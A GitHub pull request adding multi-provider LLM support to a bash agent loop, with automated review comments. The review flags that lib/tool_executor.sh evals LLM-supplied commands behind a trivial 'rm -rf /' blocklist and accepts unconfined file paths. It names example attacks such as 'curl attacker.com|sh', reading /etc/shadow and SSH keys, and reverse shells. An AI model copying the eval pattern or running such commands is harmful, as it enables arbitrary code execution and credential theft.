feat: implement multi-provider support and session management #172
mwaldheim wants to merge 13 commits into frankbria:main from
Conversation
This change introduces a provider-based architecture to support multiple LLM backends (Claude, Gemini, Copilot). It also adds a session manager and tool executor to centralize execution logic and improve session continuity.
- Added lib/providers/base.sh, claude.sh, gemini.sh, copilot.sh
- Added lib/session_manager.sh and lib/tool_executor.sh
- Updated ralph_enable.sh and ralph_loop.sh to use the new provider system
- Added tests for providers and updated existing tests
Note: Reviews paused. It looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior in the settings. Use the following commands to manage reviews:
Use the checkboxes below for quick actions:
Walkthrough
Converts Ralph from a Claude-only supervisor into a provider-agnostic agent runtime: adds a provider abstraction and adapters (Claude/Gemini/Copilot), session management, a tool executor, provider selection in the enable flow, and refactors the main loop to load and delegate to provider_execute for agentic tool-driven workflows.
Changes
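The provider abstraction described in the walkthrough amounts to a small contract each adapter implements. Below is a minimal sketch of that contract using the function names listed in this PR (provider_init, provider_execute, validate_allowed_tools); the bodies and the `some-ai-cli` backend are illustrative assumptions, not the actual adapter code.

```bash
#!/usr/bin/env bash
# Sketch of the provider contract (function names from the PR; bodies are illustrative).

provider_init() {
    # Verify the backend CLI is available and restore any prior session state.
    command -v some-ai-cli >/dev/null 2>&1 || { echo "backend CLI not found" >&2; return 1; }
}

provider_execute() {
    local loop_count=$1 prompt_file=$2 live_mode=$3
    # loop_count and live_mode would shape context building and streaming; omitted in this stub.
    local output
    output=$(some-ai-cli -p "$(cat "$prompt_file")") || return 1
    printf '%s\n' "$output"
}

validate_allowed_tools() {
    # Accept a comma-separated whitelist such as "Read,Write,Bash(git *)".
    [[ -n "$1" ]]
}
```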
Sequence Diagram
```mermaid
sequenceDiagram
    participant User
    participant RalphLoop as ralph_loop.sh
    participant ProviderBase as lib/providers/base.sh
    participant Provider as Selected Provider\n(claude/gemini/copilot)
    participant SessionMgr as lib/session_manager.sh
    participant ToolExec as lib/tool_executor.sh
    participant AIBackend as AI Backend\n(API/CLI)
    User->>RalphLoop: start
    RalphLoop->>ProviderBase: load_provider()
    ProviderBase->>Provider: source provider script
    Provider-->>ProviderBase: ready
    ProviderBase-->>RalphLoop: loaded
    RalphLoop->>Provider: provider_init()
    Provider->>SessionMgr: get_session_id()
    SessionMgr-->>Provider: session_id
    Provider-->>RalphLoop: initialized
    loop main loop
        RalphLoop->>Provider: provider_execute(loop_count,prompt,live)
        Provider->>Provider: build_loop_context()
        Provider->>AIBackend: run AI with prompt
        AIBackend-->>Provider: raw output
        Provider->>ToolExec: run_tools_if_requested(output)
        ToolExec->>AIBackend: perform tool actions (read/write/run/list)
        AIBackend-->>ToolExec: tool results
        ToolExec-->>Provider: aggregated results
        Provider->>SessionMgr: log_session_transition()
        Provider-->>RalphLoop: execution result
    end
    RalphLoop->>User: finish
```
Estimated code review effort: 🎯 4 (Complex) | ⏱️ ~70 minutes
Possibly related PRs
🚥 Pre-merge checks: ✅ Passed checks (3 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings.
✨ Finishing touches: 🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.
Add multi-provider execution with provider loader, session management, and per-provider runners for Claude, Gemini, and Copilot across
Actionable comments posted: 16
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (6)
README.md (1)
5-5: ⚠️ Potential issue | 🟡 Minor
Version badge is stale — still shows 0.11.4 while line 19 declares v0.12.0. Line 850 ("Current Status: v0.11.4") has the same mismatch. Update both the badge and the roadmap section to reflect the new version.
tests/unit/test_session_continuity.bats (1)
77-99: ⚠️ Potential issue | 🟡 Minor
Test descriptions are now stale — they reference ralph_loop.sh but the helper searches lib/session_manager.sh. Lines 86, 91, and 96 have test names like "reset_session function exists in ralph_loop.sh" but function_exists_in_ralph now searches lib/session_manager.sh. Update the test names to match the actual search target.
Proposed fix
```diff
-@test "reset_session function exists in ralph_loop.sh" {
+@test "reset_session function exists in session_manager.sh" {
   run function_exists_in_ralph "reset_session"
   [[ $status -eq 0 ]] || skip "reset_session function not yet implemented"
 }
-@test "get_session_id function exists in ralph_loop.sh" {
+@test "get_session_id function exists in session_manager.sh" {
   run function_exists_in_ralph "get_session_id"
   [[ $status -eq 0 ]] || skip "get_session_id function not yet implemented"
 }
-@test "log_session_transition function exists in ralph_loop.sh" {
+@test "log_session_transition function exists in session_manager.sh" {
   run function_exists_in_ralph "log_session_transition"
   [[ $status -eq 0 ]] || skip "log_session_transition function not yet implemented"
 }
```
As per coding guidelines, test quality must validate behavior, not just achieve coverage metrics — accurate test names are part of that quality.
ralph_enable.sh (2)
607-611: ⚠️ Potential issue | 🔴 Critical
phase_provider_selection() is defined but never called — provider is always unset.
The new phase_provider_selection (line 342) is never invoked in main(). As a result, CONFIG_PROVIDER is never set, ENABLE_PROVIDER exports an empty value (line 486), and the provider summary line (line 432) is blank. The generated .ralphrc will have an empty RALPH_PROVIDER.
Proposed fix
```diff
 # Run phases
 phase_environment_detection
 phase_task_source_selection
+phase_provider_selection
 phase_configuration
 phase_file_generation
 phase_verification
```
512-517: ⚠️ Potential issue | 🟡 Minor
Stale phase numbering in phase_verification. Lines 513 and 517 still reference "Phase 5 of 5", but the wizard now has 6 phases. This is inconsistent with the updated headers in phases 3–5.
Proposed fix
```diff
-# PHASE 5: VERIFICATION
+# PHASE 6: VERIFICATION
 # =============================================================================
 phase_verification() {
-    print_header "Verification" "Phase 5 of 5"
+    print_header "Verification" "Phase 6 of 6"
```
CLAUDE.md (2)
25-61: ⚠️ Potential issue | 🟡 Minor
Duplicate library component listings — old items 3–7 not removed.
The new numbered list (lines 25–33) supersedes the old items, but the old entries for lib/date_utils.sh (line 35), lib/timeout_utils.sh (line 40), lib/enable_core.sh (line 47), lib/wizard_utils.sh (line 53), and lib/task_sources.sh (line 58) were left in place. This creates duplicate and potentially contradictory documentation (e.g., date_utils.sh appears as both item 9 and item 3).
lib/date_utils.sh(line 35),lib/timeout_utils.sh(line 40),lib/enable_core.sh(line 47),lib/wizard_utils.sh(line 53), andlib/task_sources.sh(line 58) were left in place. This creates duplicate and potentially contradictory documentation (e.g.,date_utils.shappears as both item 9 and item 3).Remove lines 35–61 or merge their detail into the new list.
296-298: ⚠️ Potential issue | 🟡 Minor
Global Installation section not updated for new provider scripts.
Line 298 still lists only the legacy libraries (circuit_breaker.sh, response_analyzer.sh, date_utils.sh, etc.) under ~/.ralph/lib/. The new provider scripts (lib/providers/base.sh, lib/providers/claude.sh, etc.) and session_manager.sh / tool_executor.sh are missing. This will mislead users about what gets installed.
🤖 Fix all issues with AI agents
In `@lib/providers/base.sh`:
- Around line 5-21: The load_provider function uses RALPH_PROVIDER directly to
build provider_name/provider_script, allowing path traversal; validate/sanitize
RALPH_PROVIDER before use (in load_provider): restrict to an allowlist of valid
provider base names (e.g., "claude", "openai", etc.) or reject/normalize any
value containing path separators or traversal tokens (/, \, ..), then derive
provider_name from the validated value and construct provider_script only from
that safe name; ensure any fallback using BASH_SOURCE also uses the sanitized
provider_name and fail with log_status "ERROR" if validation rejects the input.
In `@lib/providers/claude.sh`:
- Around line 323-333: The function get_session_file_age_hours returns "0" for a
missing file which makes non-existent sessions appear fresh; change its behavior
to return "-1" on missing files (same sentinel used for unresolvable timestamps)
so callers like init_claude_session treat missing files as expired/invalid;
update the early check in get_session_file_age_hours (the [[ ! -f "$file" ]]
branch) to echo "-1" and return, keeping the rest of the stat fallbacks and
numeric handling unchanged.
- Around line 241-244: The progress writer currently interpolates last_line
directly into JSON which can break if it contains quotes, backslashes, or
newlines; change the block that writes to PROGRESS_FILE so it constructs the
JSON safely (e.g., use jq or printf + jq) rather than direct shell
interpolation: take the variables progress_counter, last_line, and the
timestamp, pass/escape last_line through jq/stringify and produce {
"status":"executing", "elapsed_seconds": (progress_counter * 10), "last_output":
last_line, "timestamp": ... } robustly; update the code around PROGRESS_FILE,
last_line and progress_counter to use jq or proper JSON-escaping before writing
the file.
- Around line 59-74: The inner-loop currently accepts any Bash(...) tool because
the regex check is hardcoded; update the validation in the tools loop so each
tool is matched against the current VALID_TOOL_PATTERNS entry instead of a
catch-all Bash regex — when iterating patterns in the for loop (the variable
named pattern), perform glob-style matching of tool against the pattern (e.g.,
use the pattern unquoted in the [[ "$tool" == $pattern ]] test or translate the
whitelist pattern to a proper regex) so whitelist entries like Bash(git *) match
Bash(git log) but Bash(rm -rf /) does not; keep the surrounding trimming and
empty-check logic and return the same error/exit behavior on mismatch.
- Around line 160-164: The function mutates the global variable
CLAUDE_OUTPUT_FORMAT when LIVE_OUTPUT is true, causing the override to persist
across iterations; fix by creating a local variable (e.g., output_format)
initialized from CLAUDE_OUTPUT_FORMAT, adjust it to "json" when
LIVE_OUTPUT=="true", and use output_format throughout this function (including
where build_claude_command is called) instead of mutating CLAUDE_OUTPUT_FORMAT;
alternatively save the original value and restore it before returning to avoid
global leakage.
In `@lib/providers/copilot.sh`:
- Around line 52-56: The multi-line invocation of $COPILOT_CMD is being treated
as separate commands; fix the call so all arguments and the stdout/stderr
redirection apply to the single command by joining the lines properly (either
put the entire invocation on one line or add backslash continuations) so that
$COPILOT_CMD receives -p "$full_prompt", $session_arg, --allow-all-tools,
--no-ask-user and the final > "$output_file" 2>&1 applies to that single
command; update the call in lib/providers/copilot.sh where COPILOT_CMD,
session_arg and output_file are used.
In `@lib/providers/gemini.sh`:
- Around line 16-19: The provider_execute function currently accepts a live_mode
parameter that is not used; either remove the unused parameter from
provider_execute (and update callers) if Gemini does not support live output, or
add handling inside provider_execute to detect live_mode being truthy and emit a
clear warning/log (e.g., "live mode not supported for Gemini") before
proceeding; reference the provider_execute function and the live_mode variable
when making the change so callers and logs are updated consistently.
- Around line 24-28: The code currently builds session_arg as a string
("session_arg=\"--resume latest\"") and relies on unquoted expansion to split it
into two arguments, which is fragile; change session_arg to an array (initialize
session_arg=() and set session_arg=(--resume latest) when CLAUDE_USE_CONTINUE ==
"true") and then use the array expansion "${session_arg[@]}" at the command
invocation site so the optional resume flag is passed safely as separate
arguments; refer to the session_arg variable and the CLAUDE_USE_CONTINUE check
to locate where to make the change.
- Around line 30-33: The code builds full_prompt using literal "\n" sequences so
full_prompt ends up containing backslash-n instead of real newlines; update the
construction of full_prompt to generate actual newlines (e.g., use printf or
similar) when combining loop_context and prompt_content so
build_loop_context/loop_context and prompt_content are joined with real newline
characters before sending to Gemini (replace the current full_prompt assignment
with a printf-based concatenation). A minimal sketch appears after this list.
- Around line 65-86: The build_loop_context function is duplicated in gemini.sh
and claude.sh; extract it into a single shared helper (e.g.,
lib/providers/base.sh or lib/providers/common.sh) containing the
build_loop_context() implementation, then remove the duplicated function bodies
from both gemini.sh and claude.sh and add a single source line (e.g., source
lib/providers/base.sh) at the top of each file so both scripts use the shared
implementation; ensure the shared file expects RALPH_DIR and jq/grep to be
available (or document/export RALPH_DIR if necessary) and keep the function name
build_loop_context unchanged so callers need no edits.
In `@lib/session_manager.sh`:
- Around line 53-81: In log_session_transition, ensure loop_number is a safe
numeric before using jq --argjson: validate/coerce the local variable
loop_number (set by ${4:-0}) to an integer (e.g., if empty or non-numeric,
replace with 0 or use arithmetic expansion/regex) and then pass that sanitized
numeric to jq; keep the rest of the function (get_iso_timestamp, transition,
history, and writing to RALPH_SESSION_HISTORY_FILE) unchanged but reference the
sanitized loop_number when building transition so --argjson loop_number
"$loop_number" cannot fail.
- Around line 46-48: reset_session currently uses an implicit caller-scoped
variable loop_count in the log_session_transition call; make loop_count an
explicit parameter to reset_session (or read it as a positional arg) and pass it
to log_session_transition (use a default of 0 if not supplied) so the function
no longer relies on dynamic scope; update the reset_session signature/parameter
handling and replace "${loop_count:-0}" with the explicit parameter (or
"${2:-0}") and keep the call to log_session_transition "active" "reset"
"$reason" "<explicit_loop_count>".
In `@lib/tool_executor.sh`:
- Around line 67-68: Split declaration and assignment for the temporary
variables: declare local results_file and temp_blocks_dir separately, then
assign each with command substitution (results_file=$(mktemp) and
temp_blocks_dir=$(mktemp -d)) and immediately check the return/status (or test
for non-empty) after each mktemp; if mktemp fails, log an error and exit to
avoid running dangerous operations like rm -rf "$temp_blocks_dir". Ensure
references to results_file and temp_blocks_dir (used later, e.g., in
cleanup/removal) only proceed after the successful creation checks.
- Around line 13-35: The read_file and write_file handlers accept an unvalidated
LLM-supplied path (variable path) and can be exploited for path traversal; fix
by canonicalizing and confining paths to the project root before any file
access: resolve user expansions and relative segments (e.g. expand ~, use
realpath -m or equivalent on $path and on the project root), verify the resolved
path begins with the resolved project root prefix, reject and log any paths
outside that root (return an error rather than reading/writing), and when
writing ensure mkdir -p and writes operate only on the confined resolved path
and that parent directories are inside the root; apply these checks in both the
"read_file" and "write_file" branches that reference $path and $file_content
(use $tool_name in error logs).
- Around line 37-49: The run_command case uses eval on untrusted AI output
(variable cmd) which allows arbitrary command execution; remove eval "$cmd" and
instead validate and execute safely: implement an allowlist check against the
requested executable/first token (in the run_command handler) and reject
anything not explicitly permitted, run the allowed command inside a sandboxed
runner (e.g., Docker/firejail/bwrap invocation) with a restricted working
directory and no network, require interactive user confirmation for any
non-trivial command, and capture/relay stdout, stderr and exit code from the
sandboxed process back to the caller; update the run_command logic to perform
these checks before execution and return a clear error when a command is
disallowed.
In `@ralph_loop.sh`:
- Around line 794-796: The module-level call to load_provider runs before
load_ralphrc and causes the default provider (claude) to be loaded twice and
validate_allowed_tools to validate against the wrong provider; remove or comment
out the top-level load_provider invocation and instead call load_provider from
main() after load_ralphrc() (or ensure load_provider is invoked before any
provider-dependent checks), and update call-sites so validate_allowed_tools runs
only after load_provider has loaded the user-configured RALPH_PROVIDER.
🧹 Nitpick comments (14)
lib/providers/base.sh (1)
14-16: Suppress SC1090 with a directive since dynamic sourcing is intentional here.
Proposed fix
```diff
 if [[ -f "$provider_script" ]]; then
+    # shellcheck source=/dev/null
     source "$provider_script"
```
tests/unit/test_providers.bats (2)
50-69: Function-existence tests will produce confusing failures if sourcing the provider script errors out.
Since source and declare -F are called directly (not via run), any missing dependency in the provider script will abort the test with an opaque error instead of a clear assertion. Wrapping in run would make failures more readable.
Proposed refactor (example for claude)
```diff
 @test "claude provider implements required functions" {
-    source "$BATS_TEST_DIRNAME/../../lib/providers/claude.sh"
-    declare -F provider_init
-    declare -F provider_execute
-    declare -F validate_allowed_tools
+    run bash -c "
+        source '$BATS_TEST_DIRNAME/../../lib/providers/claude.sh' &&
+        declare -F provider_init &&
+        declare -F provider_execute &&
+        declare -F validate_allowed_tools
+    "
+    assert_success
 }
```
1-69: Consider adding a test for an invalid/unknown provider name to cover the error path.
load_provider exits with status 1 for missing providers — verifying this behavior would improve coverage of the base loader.
```bash
@test "load_provider fails for unknown provider" {
    export RALPH_PROVIDER="nonexistent"
    export RALPH_HOME="$BATS_TEST_DIRNAME/../.."
    source "$BATS_TEST_DIRNAME/../../lib/providers/base.sh"
    run load_provider
    [[ $status -ne 0 ]]
    [[ "$output" == *"ERROR"* ]]
}
```
lib/providers/copilot.sh (3)
16-23: Unused variables live_mode and session_file.
live_mode (line 19) is accepted as a parameter but never used — the function doesn't support streaming. session_file (line 23) is declared but never read. Either use them or remove/document them as intentional placeholders.
80-101: build_loop_context is duplicated across all three providers.
This function is identical in claude.sh, gemini.sh, and copilot.sh (confirmed by the relevant code snippets). Extract it into lib/providers/base.sh or a shared utility to follow DRY; a sketch of the resulting sourcing pattern follows.
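If the extraction lands in lib/providers/base.sh, each provider only needs a small sourcing guard. A sketch, assuming base.sh sits next to the provider scripts and can be sourced standalone:

```bash
# In lib/providers/claude.sh / gemini.sh / copilot.sh (sketch):
# source the shared helpers once, then rely on the common build_loop_context.
if ! declare -F build_loop_context >/dev/null; then
    # shellcheck source=/dev/null
    source "$(dirname "${BASH_SOURCE[0]}")/base.sh"
fi
```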
8-13: provider_init calls exit 1 instead of return 1.
Calling exit from a sourced library terminates the entire shell. Other init paths (e.g., load_provider in base.sh) already call exit 1, so this works today, but a return 1 with the caller handling the error would be more composable and testable.
IMPLEMENTATION_PLAN_MULTI_PROVIDER.md (1)
1-65: Plan is out of sync with the implementation shipping in this same PR.
The plan references provider_chat and provider_parse (line 9) but the actual implementations use provider_execute and validate_allowed_tools. All checkboxes are unchecked despite most items being implemented in this PR. The estimated effort (lines 61–65) only covers Phases 1–3 but there are 5 phases listed.
Consider updating the plan to reflect the actual interface and marking completed items, or remove this file if it's purely historical and move relevant notes to a design doc or ADR.
ANALYSIS_REPORT.md (1)
27-31: Interface names in analysis don't match the implemented API.
The analysis references init_session(), send_message(prompt, context), and parse_response(output) as the provider interface, but the actual implementations use provider_init(), provider_execute(loop_count, prompt_file, live_mode), and rely on analyze_response() from the shared response analyzer. Consider updating this document to match, or add a note that the final interface evolved.
lib/session_manager.sh (3)
83-86: $RANDOM provides limited uniqueness for session IDs.
$RANDOM yields values 0–32767. Combined with a Unix timestamp (1-second resolution), two sessions created within the same second have a ~1-in-32768 collision chance. This is probably fine for a single-user CLI tool, but if stronger guarantees are ever needed, consider appending $$ (PID) or using /dev/urandom:
```bash
echo "ralph-$(date +%s)-$(head -c 4 /dev/urandom | od -An -tx1 | tr -d ' ')"
```
110-115: Non-atomic read-modify-write of the session file.
Line 114 reads RALPH_SESSION_FILE via jq, and line 115 writes the result back to the same file. If jq fails mid-read or the process is interrupted between read and write, the file could be truncated/corrupted. Write to a temp file and mv atomically.
Proposed fix
```diff
 update_session_last_used() {
     [[ ! -f "$RALPH_SESSION_FILE" ]] && return 0
     local ts
     ts=$(get_iso_timestamp)
     local updated
     updated=$(jq --arg last_used "$ts" '.last_used = $last_used' "$RALPH_SESSION_FILE" 2>/dev/null)
-    [[ -n "$updated" ]] && echo "$updated" > "$RALPH_SESSION_FILE"
+    if [[ -n "$updated" ]]; then
+        local tmp_file="${RALPH_SESSION_FILE}.tmp"
+        echo "$updated" > "$tmp_file" && mv "$tmp_file" "$RALPH_SESSION_FILE"
+    fi
 }
```
25-25: ShellCheck SC2155: Declare and assign separately throughout the file.
Multiple lines combine local declaration with command substitution (e.g., local ts=$(get_iso_timestamp)), which masks the return value of the command. This is flagged by ShellCheck on lines 25, 58, 60, 90, 92, 113, and 114.
The idiomatic pattern is:
```bash
local ts
ts=$(get_iso_timestamp)
```
This applies to all local var=$(...) assignments in this file. Consider fixing across the board for consistency.
Also applies to: 58-60, 90-92, 113-114
lib/providers/gemini.sh (1)
25-25: Provider-specific code references CLAUDE_USE_CONTINUE.
The Gemini provider checks a Claude-named variable (CLAUDE_USE_CONTINUE) to decide whether to resume a session. This is a leaky abstraction — the variable should be provider-agnostic (e.g., RALPH_USE_CONTINUE or PROVIDER_USE_CONTINUE) and set in the base provider or configuration layer.
lib/providers/claude.sh (2)
251-253: Same JSON injection pattern in success/failure progress writes.
Lines 253 and 282 also use string interpolation with $(date ...) inside JSON. While date output is predictable here and unlikely to contain special characters, these should also use jq for consistency with the fix on line 243.
Also applies to: 281-282
293-312: build_claude_command sets a global array CLAUDE_CMD_ARGS — document or scope it.
CLAUDE_CMD_ARGS is populated as a side-effect (line 298). This is the core mechanism by which the caller retrieves the built command, but it's undeclared and undocumented as a global contract. Also, line 311 embeds the entire prompt file content into a command-line argument via $(cat "$prompt_file") — very large prompt files could exceed ARG_MAX (typically 2MB on Linux).
Consider adding a comment documenting the global, and for robustness, validate the prompt file size.
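Two small sketches for the last two claude.sh nitpicks above: building the progress record with jq so the interpolated values are always valid JSON, and guarding the prompt size before it is embedded into argv. The helper names (write_progress, check_prompt_size) and the 1 MB threshold are illustrative assumptions; PROGRESS_FILE and the fields mirror the review comments.

```bash
# Sketch: build the progress JSON with jq instead of shell interpolation.
write_progress() {
    local progress_counter=$1 last_line=$2   # progress_counter assumed numeric
    jq -n \
        --arg last_output "$last_line" \
        --arg timestamp "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
        --argjson elapsed_seconds "$((progress_counter * 10))" \
        '{status: "executing", elapsed_seconds: $elapsed_seconds,
          last_output: $last_output, timestamp: $timestamp}' > "$PROGRESS_FILE"
}

# Sketch: refuse to embed very large prompt files into a command-line argument.
check_prompt_size() {
    local prompt_file=$1 max_bytes=$((1024 * 1024))   # illustrative limit
    local size
    size=$(wc -c < "$prompt_file")
    (( size <= max_bytes )) || { echo "prompt file too large for argv: ${size} bytes" >&2; return 1; }
}
```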
```bash
log_session_transition() {
    local from_state=$1
    local to_state=$2
    local reason=$3
    local loop_number=${4:-0}
    local ts=$(get_iso_timestamp)

    local transition=$(jq -n -c \
        --arg timestamp "$ts" \
        --arg from_state "$from_state" \
        --arg to_state "$to_state" \
        --arg reason "$reason" \
        --argjson loop_number "$loop_number" \
        '{
            timestamp: $timestamp,
            from_state: $from_state,
            to_state: $to_state,
            reason: $reason,
            loop_number: $loop_number
        }')

    local history='[]'
    if [[ -f "$RALPH_SESSION_HISTORY_FILE" ]]; then
        history=$(cat "$RALPH_SESSION_HISTORY_FILE" 2>/dev/null)
        jq empty <<<"$history" 2>/dev/null || history='[]'
    fi

    echo "$history" | jq ". += [$transition] | .[-50:]" > "$RALPH_SESSION_HISTORY_FILE"
}
```
--argjson will error if loop_number is non-numeric.
Line 65 uses --argjson loop_number "$loop_number" which expects a valid JSON number. If the caller passes an empty string or non-numeric value, jq will fail and transition will be empty — silently producing a corrupt history entry via line 80. The default on line 57 (${4:-0}) mitigates this for the missing-argument case, but not for an explicitly passed non-numeric value.
Consider validating or coercing to integer:
Proposed fix
```diff
-    local loop_number=${4:-0}
+    local loop_number=${4:-0}
+    [[ "$loop_number" =~ ^[0-9]+$ ]] || loop_number=0
```
🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 58-58: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 60-60: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/session_manager.sh` around lines 53 - 81, In log_session_transition,
ensure loop_number is a safe numeric before using jq --argjson: validate/coerce
the local variable loop_number (set by ${4:-0}) to an integer (e.g., if empty or
non-numeric, replace with 0 or use arithmetic expansion/regex) and then pass
that sanitized numeric to jq; keep the rest of the function (get_iso_timestamp,
transition, history, and writing to RALPH_SESSION_HISTORY_FILE) unchanged but
reference the sanitized loop_number when building transition so --argjson
loop_number "$loop_number" cannot fail.
```bash
        "read_file")
            local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s')
            if [[ -f "$path" ]]; then
                echo "--- TOOL RESULT ($tool_name) ---"
                cat "$path"
                echo "-------------------------------"
            else
                echo "Error: File not found: $path"
            fi
            ;;
        "write_file")
            local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s')
            local file_content=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="content">(.*?)<\/arg>/s')

            if [[ -n "$path" ]]; then
                mkdir -p "$(dirname "$path")"
                echo "$file_content" > "$path"
                echo "--- TOOL RESULT ($tool_name) ---"
                echo "Successfully wrote to $path"
                echo "-------------------------------"
            else
                echo "Error: Missing path for write_file"
            fi
```
Path traversal risk in read_file and write_file.
Both handlers accept an LLM-supplied path without any validation or confinement. A malicious or hallucinating model can read sensitive files (/etc/passwd, ~/.ssh/id_rsa) or write to arbitrary locations (../../.bashrc, /tmp/crontab). Validate that path resolves to a location within the project directory.
Sketch: confine paths to the project root
+# Resolve and validate path is within project root
+validate_path() {
+ local target="$1"
+ local resolved
+ resolved="$(cd "$(dirname "$target")" 2>/dev/null && pwd)/$(basename "$target")"
+ local project_root
+ project_root="$(pwd)"
+ if [[ "$resolved" != "$project_root"/* ]]; then
+ echo "Error: Path outside project directory: $target" >&2
+ return 1
+ fi
+ echo "$resolved"
+}🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 14-14: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 24-24: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 25-25: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/tool_executor.sh` around lines 13 - 35, The read_file and write_file
handlers accept an unvalidated LLM-supplied path (variable path) and can be
exploited for path traversal; fix by canonicalizing and confining paths to the
project root before any file access: resolve user expansions and relative
segments (e.g. expand ~, use realpath -m or equivalent on $path and on the
project root), verify the resolved path begins with the resolved project root
prefix, reject and log any paths outside that root (return an error rather than
reading/writing), and when writing ensure mkdir -p and writes operate only on
the confined resolved path and that parent directories are inside the root;
apply these checks in both the "read_file" and "write_file" branches that
reference $path and $file_content (use $tool_name in error logs).
```bash
        "run_command")
            local cmd=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="command">(.*?)<\/arg>/s')
            if [[ -n "$cmd" ]]; then
                if [[ "$cmd" == *"rm -rf /"* ]]; then
                    echo "Error: Dangerous command blocked"
                else
                    echo "--- TOOL RESULT ($tool_name) ---"
                    eval "$cmd" 2>&1
                    echo "-------------------------------"
                fi
            else
                echo "Error: Missing command for run_command"
            fi
```
Critical security: eval on LLM-generated input is an arbitrary command execution vulnerability.
Line 44 runs eval "$cmd" where $cmd is extracted from AI output. The safety check on line 40 only blocks the literal string rm -rf / — trivially bypassed with rm -rf /*, curl attacker.com|sh, cat /etc/shadow, reverse shells, etc. A blocklist approach cannot secure eval against untrusted input.
At minimum, consider:
- Running commands in a sandboxed environment (Docker, firejail, bwrap)
- Using an allowlist of permitted commands instead of a blocklist
- Requiring explicit user confirmation before execution
- Restricting execution to a project-scoped working directory
Sketch of an allowlist approach
"run_command")
local cmd
cmd=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="command">(.*?)<\/arg>/s')
if [[ -n "$cmd" ]]; then
- if [[ "$cmd" == *"rm -rf /"* ]]; then
- echo "Error: Dangerous command blocked"
- else
- echo "--- TOOL RESULT ($tool_name) ---"
- eval "$cmd" 2>&1
- echo "-------------------------------"
- fi
+ # Allowlist: only permit known safe command prefixes
+ local allowed=false
+ for pattern in "git " "npm " "pytest" "bats " "ls " "cat " "grep "; do
+ if [[ "$cmd" == ${pattern}* ]]; then
+ allowed=true
+ break
+ fi
+ done
+ if [[ "$allowed" == "true" ]]; then
+ echo "--- TOOL RESULT ($tool_name) ---"
+ bash -c "$cmd" 2>&1
+ echo "-------------------------------"
+ else
+ echo "Error: Command not in allowlist: $cmd"
+ fi
else
echo "Error: Missing command for run_command"
fi🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 38-38: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/tool_executor.sh` around lines 37 - 49, The run_command case uses eval on
untrusted AI output (variable cmd) which allows arbitrary command execution;
remove eval "$cmd" and instead validate and execute safely: implement an
allowlist check against the requested executable/first token (in the run_command
handler) and reject anything not explicitly permitted, run the allowed command
inside a sandboxed runner (e.g., Docker/firejail/bwrap invocation) with a
restricted working directory and no network, require interactive user
confirmation for any non-trivial command, and capture/relay stdout, stderr and
exit code from the sandboxed process back to the caller; update the run_command
logic to perform these checks before execution and return a clear error when a
command is disallowed.
```bash
    local results_file=$(mktemp)
```
Declare and assign separately for results_file and temp_blocks_dir.
Per SC2155, combining local and command substitution masks the return value of mktemp. If mktemp fails, the variable silently gets an empty string and subsequent operations (like rm -rf "$temp_blocks_dir" on line 85) could behave dangerously.
Proposed fix
- local results_file=$(mktemp)
+ local results_file
+ results_file=$(mktemp) || { echo "Error: mktemp failed"; return 1; }
local found_tools=false
- local temp_blocks_dir=$(mktemp -d)
+ local temp_blocks_dir
+ temp_blocks_dir=$(mktemp -d) || { rm -f "$results_file"; echo "Error: mktemp -d failed"; return 1; }📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| local results_file=$(mktemp) | |
| local results_file | |
| results_file=$(mktemp) || { echo "Error: mktemp failed"; return 1; } | |
| local found_tools=false | |
| local temp_blocks_dir | |
| temp_blocks_dir=$(mktemp -d) || { rm -f "$results_file"; echo "Error: mktemp -d failed"; return 1; } |
🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 67-67: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/tool_executor.sh` around lines 67 - 68, Split declaration and assignment
for the temporary variables: declare local results_file and temp_blocks_dir
separately, then assign each with command substitution (results_file=$(mktemp)
and temp_blocks_dir=$(mktemp -d)) and immediately check the return/status (or
test for non-empty) after each mktemp; if mktemp fails, log an error and exit to
avoid running dangerous operations like rm -rf "$temp_blocks_dir". Ensure
references to results_file and temp_blocks_dir (used later, e.g., in
cleanup/removal) only proceed after the successful creation checks.
```bash
# Load AI provider
load_provider
```
load_provider called at module level before .ralphrc is loaded — provider loaded twice, possibly with different backends.
load_provider here (line 795) runs before argument parsing and before load_ralphrc() (which is called inside main() at line 531). Since RALPH_PROVIDER hasn't been read from .ralphrc yet, this always loads the default claude provider. Then main() calls load_provider again (line 538) after .ralphrc is loaded, potentially sourcing a different provider.
This means validate_allowed_tools (line 876, called during argument parsing) runs against the default provider's implementation, not the one the user configured. Consider deferring the first load_provider to after .ralphrc is sourced, or restructuring so validate_allowed_tools doesn't depend on provider loading.
One approach: remove module-level load, defer to main
-# Load AI provider
-load_provider
-
# Parse command line arguments
 while [[ $# -gt 0 ]]; do
Then in main(), ensure load_provider runs before any provider-dependent validation (or move --allowed-tools validation into main after the provider is loaded).
🤖 Prompt for AI Agents
In `@ralph_loop.sh` around lines 794 - 796, The module-level call to load_provider
runs before load_ralphrc and causes the default provider (claude) to be loaded
twice and validate_allowed_tools to validate against the wrong provider; remove
or comment out the top-level load_provider invocation and instead call
